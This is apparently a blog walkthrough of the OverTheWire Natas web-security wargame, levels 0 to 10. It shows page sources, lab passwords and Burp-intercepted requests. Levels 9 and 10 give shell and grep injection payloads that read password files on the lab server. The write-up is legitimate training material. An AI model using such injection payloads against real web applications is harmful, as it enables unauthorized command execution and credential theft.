This is my first attempt at an online wargame called ‘Natas’ hosted by overthewire.org. The personal goal of attempting this wargame is to refresh my knowledge on web-application security. I have completed a similar wargame called ‘Bandit’ but that is a simple refresher on unix/linux administration, therefore I will not be documenting anything with regards to that as there are already tons of websites covering the solutions available online.
As mentioned by overthewire.org:
Natas teaches the basics of serverside web-security.
Each level of natas consists of its own website located at http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password.
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Start here:
Username: natas0
Password: natas0
URL: http://natas0.natas.labs.overthewire.org
So lets begin!
LEVEL 0
- Head over to the URL: http://natas0.natas.labs.overthewire.org.
- We are greeted with a page that says ‘You can find the password for the next level on this page’. That’s an obvious hint!
- View the source of the page and we are greeted with the password.
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto --></div>
</body>
</html>
The password is shown on line 16 in a html comment.
On to the next level…
LEVEL 1
Username: natas1
URL: http://natas1.natas.labs.overthewire.org
For this level, there is a javascript that prevents right-clicking. Since I am using the Chrome browser, using the shortcut CTRL-U allows me to bypass this and obtain the password:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi --></div>
</body>
</html>
On to the next level…
LEVEL 2
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
Seems like there is nothing much here except for a pixel.png file. I downloaded it, tried to open it in a text viewer but nope, no go, the file is indeed a png file. However notice the parent directory of the ‘pixel.png’ file, which is called ‘files’. If you append that to the URL: http://natas2.natas.labs.overthewire.org/files/ you get an open directory listing with a text file called ‘users.txt’. Open that and the password will be in there.
# username:password alice:BYNdCesZqW bob:jw2ueICLvT charlie:G5vCxkVV3m natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 eve:zo4mJWyNj2 mallory:9urtcpzBmH
On to the next level…
LEVEL 3
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14" };</script></head>
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>
The hint right here is “Not even Google will find it this time…” To understand this, it is good to read up on ‘The Robots Exclusion Protocol’ here: http://www.robotstxt.org/robotstxt.html. Similarly, append ‘robots.txt’ to the URL: http://natas3.natas.labs.overthewire.org/robots.txt.
User-agent: * Disallow: /s3cr3t/
Then append the disallowed path to the URL: http://natas3.natas.labs.overthewire.org/s3cr3t/. Open the text file named ‘users.txt’ and the password will be in that file.
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
On to the next level…
LEVEL 4
For level 4, we get an error message: “Access disallowed. You are visiting from http://natas4.natas.labs.overthewire.org while authorized users should come only from http://natas5.natas.labs.overthewire.org. ” There are may ways to do this. Depending on preference, you could check out the various plugins for browsers. For me, I chose to use Burp Suite to intercept the HTTP GET request and add a referer field into the header.
GET /index.php HTTP/1.1 Host: natas4.natas.labs.overthewire.org Referer: http://natas5.natas.labs.overthewire.org/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va Cache-Control: max-age=0
After the page is refreshed, the password will be revealed in a message:
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
On to the next level…
LEVEL 5
We are immediately greeted with a message: “Access disallowed. You are not logged in”. Upon accessing the natas5 URL. I checked the source but nope, no luck there. I then set up Burp Suite again, hit refresh, and intercept the HTTP GET request:
GET /index.php HTTP/1.1 Host: natas5.natas.labs.overthewire.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: loggedin=0 Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx Cache-Control: max-age=0
Notice line 10. There is a cookie called ‘loggedin’ which is set to 0. Changed the value to 1, forward the request and viola, the page refreshed with the password shown:
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
On to the next level…
LEVEL 6
We are greeted with a screen that has an input box asking for an input secret. Clicking the view source link shows us a php script:
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
Notice line 3. Appending “includes/secret.inc” to the URL: http://natas6.natas.labs.overthewire.org/includes/secret.inc and the input secret will be revealed:
<? $secret = "FOEIUWGHFEEUHOFUOIU"; ?>
Return to the homepage of natas6 and input the secret “FOEIUWGHFEEUHOFUOIU” and the password will be revealed:
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
On to the next level…
LEVEL 7
For natas7, it is pretty straight forward. On viewing the page source, we can see an obvious hint:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
Going back to the homepage, simply click on any of the links, in my case, I clicked on ‘About’. Notice the URL of the ‘About’ page: http://natas7.natas.labs.overthewire.org/index.php?page=about. We can change the ‘about’ in the URL to ‘/etc/natas_webpass/natas8’ and the password will be revealed.
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
On to the next level…
LEVEL 8
Level 8 is similar to level 6. Right click and view source and you will be able to see a php script:
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
Looking at the script, we can see that the secret variable (which is the input secret we need to put in) is first encoded by base64(), the output string is then reversed and then converted using php’s bin2hex(). I solved this by creating a php snippet with exactly the reverse of the initial encoding:
$ cat reverse.php
<?
echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));
?>
Followed by running the the php command with the -n -f flags in any shell with php installed. In my case I used Cygwin:
$ php -n -f reverse.php oubWYf2kBq
The output of the php snippet is ‘oubWYf2kBq’ which will be the input secret. Return to the homepage and key that in to reveal the password for natas9:
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
On to the next level…
LEVEL 9
Level 9 is interesting. On viewing the source, we can see a php script:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
Looking at the script, it seems like the php passthru() function is used. This means we can inject shell commands to the server as the current web user which is natas9! So simply inject the command:
; cat /etc/natas_webpass/natas10 #
into the text field and the password for natas10 will be revealed. Why does this work? Take a look at:
passthru("grep -i $key dictionary.txt");
Looking at the code, we know that the $key variable is equals to whatever is keyed into the text field on the page. The purpose of adding ‘;’ at the beginning is to close the previous grep command, and run the ‘cat /etc/natas_webpass/natas10’ command. You may ask, why ‘/etc/natas_webpass/natas10’? I inferred from the Bandit wargame and level 5 of Natas that all passwords for the corresponding exercises can be found in the ‘/etc/natas_webpass/’ directory. So you must be thinking whether you can simply use this form to get all other passwords and skip the exercises entirely? NOPE. The folders are only readable by the current user, so that is not allowed. The ‘#’ at the end is just to truncate/comment the dictionary.txt for a cleaner output. The ‘#’ is optional, you will still get the password irregardless of whether you add the ‘#’ or not.
natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
On to the next level…
LEVEL 10
Level 10 is similar to the previous level, but this time, the php code filters certain characters:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
Notice line 9. Now the code checks for ‘;’ which means we can no longer terminate the ‘grep’ command to run the ‘cat’ command. However, we can still use grep to grep all the data from /etc/natas_webpass/natas11 by simply extending command to grep all contents of that file!
.* /etc/natas_webpass/natas11 #
The explanation for this is simple. For the ‘.*’ portion, you should check the man page of grep to fully understand that. Other than that, the rest is similar to level 9.
.htaccess:AuthType Basic .htaccess: AuthName "Authentication required" .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd .htaccess: require valid-user .htpasswd:natas10:$1$YvNQ2ijE$iO2t49ZDxkCdXUw6cBlkN/ /etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
v00d00 